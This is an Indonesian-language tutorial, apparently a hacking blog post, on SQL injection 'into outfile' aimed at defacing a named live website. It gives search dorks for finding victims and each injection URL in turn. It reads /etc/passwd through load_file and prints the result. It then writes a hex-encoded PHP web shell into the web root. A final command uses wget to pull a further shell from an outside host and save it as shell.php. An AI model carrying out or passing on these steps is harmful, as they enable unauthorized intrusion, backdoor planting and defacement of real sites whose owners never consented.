Cara melakukan SQL Into Outfile


-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL into outfile.
Untuk apa? Untuk deface lah :'C
-
Langsung saja.
Disini saya menggunakan live target yah...
Live target : https://bengalupdate.in/
Kalau kalian ingin mencari target lain yah silakan
-Dork : inurl:".php?id=" "hotel"
-Uploader : http://arunatoursbali.com/sec.txt
-Shell Backdoor bisa kalian download dimana saja


>Yaps itu tampilan live target nya yah, sekarang mari kita cari parameter di website tersebut.
Bisa dengan cara mendorking nya dan bisa juga dengan cara menjelajah setiap page yg muncul di index page nya.
-Dorking parameter : site:lon-t.online ".php?
Contoh : site:bengalupdate.in ".php?


>http://www.bengalupdate.in/post_details-page.php?id=4225
Itu parameter dari live target ku.
>sekarang mari kita inject seperti biasa.
>kita akan menentukan vuln atau tidaknya websitenya, beri ' di belakang url.
Contoh : http://www.bengalupdate.in/post_details-page.php?id=4225'


>dan, terlihat bahwa website bisa untuk di inject.
>sekarang lanjut kita order by untuk menentukan jumlah column pada database.

http://www.bengalupdate.in/post_details-page.php?id=4225'+order+by+1--+- ~> normal

http://www.bengalupdate.in/post_details-page.php?id=4225'+order+by+10--+- ~> normal

http://www.bengalupdate.in/post_details-page.php?id=4225'+order+by+20--+- ~> normal

http://www.bengalupdate.in/post_details-page.php?id=4225'+order+by+21--+- ~> normal

http://www.bengalupdate.in/post_details-page.php?id=4225'+order+by+22--+- ~> normal

http://www.bengalupdate.in/post_details-page.php?id=4225'+order+by+23--+- ~> normal

http://www.bengalupdate.in/post_details-page.php?id=4225'+order+by+24--+- ~> error


>nah error, kita mendapatkan error di column 24 yang berarti batas column hanya sampai 23.
>sekarang mari kita lakukan union select
Follow me :'C

http://www.bengalupdate.in/post_details-page.php?id=4225'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+-

Hasil :


Tidak muncul angka togel? It's okay.
Kita tambahkan +and+0 setelah '

http://www.bengalupdate.in/post_details-page.php?id=4225'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+-

Hasil : 


>angka togel sudah muncul, sekarang mari kita cek user nya,

http://www.bengalupdate.in/post_details-page.php?id=4225'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23--+-


>root@localhost
>lanjut untuk melihat akses file_priv

http://www.bengalupdate.in/post_details-page.php?id=4225'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,file_priv,14,15,16,17,18,19,20,21,22,23+from+mysql.user--+-


Ko tidak muncul apapun? Kita tidak mendapatkan N/Y :'(
>kita coba mencari path dari website tersebut,
Mari kita lakukan load_file('/etc/passwd')

http://www.bengalupdate.in/post_details-page.php?id=4225'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,load_file('/etc/passwd'),14,15,16,17,18,19,20,21,22,23+from+mysql.user--+-


>ternyata kita di tipu oleh admin website tersebut.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:112:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
ftpuser:x:1001:1001:,,,:/var/www/html:/bin/bash
smmta:x:113:118:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
smmsp:x:114:119:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin

>disini kita mendapatkan /var/www/html dan /html adalah document_root dari website tersebut.
>lanjut kita upload shell sederhana dulu.
<?php system($_GET['yes']);?>

>kita encrypt menjadi hex
0x3c3f7068702073797374656d28245f4745545b7965735d293b3f3e

http://www.bengalupdate.in/post_details-page.php?id=4225'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,0x3c3f7068702073797374656d28245f4745545b7965735d293b3f3e,14,15,16,17,18,19,20,21,22,23+into+outfile+'/var/www/html/test.php'--+-

>maka kalian akan mendapat error saat melakukan into outfile.
>dan sekarang mari kita akses 


Kok hanya roti? Eh hanya angka. 
Tenang, namanya juga shell biasa. 
>sekarang kita mainin rce² buat upload shell nya

http://www.bengalupdate.in/test.php?yes=wget https://linkyourshell/shell.txt -O shell.php
-
Contoh : 
http://www.bengalupdate.in/test.php?yes=wget http://arunatoursbali.com/sec.txt -O shell.php

Lalu kalian akses
https://localhost/shell.php

Ok, thanks
Byeee....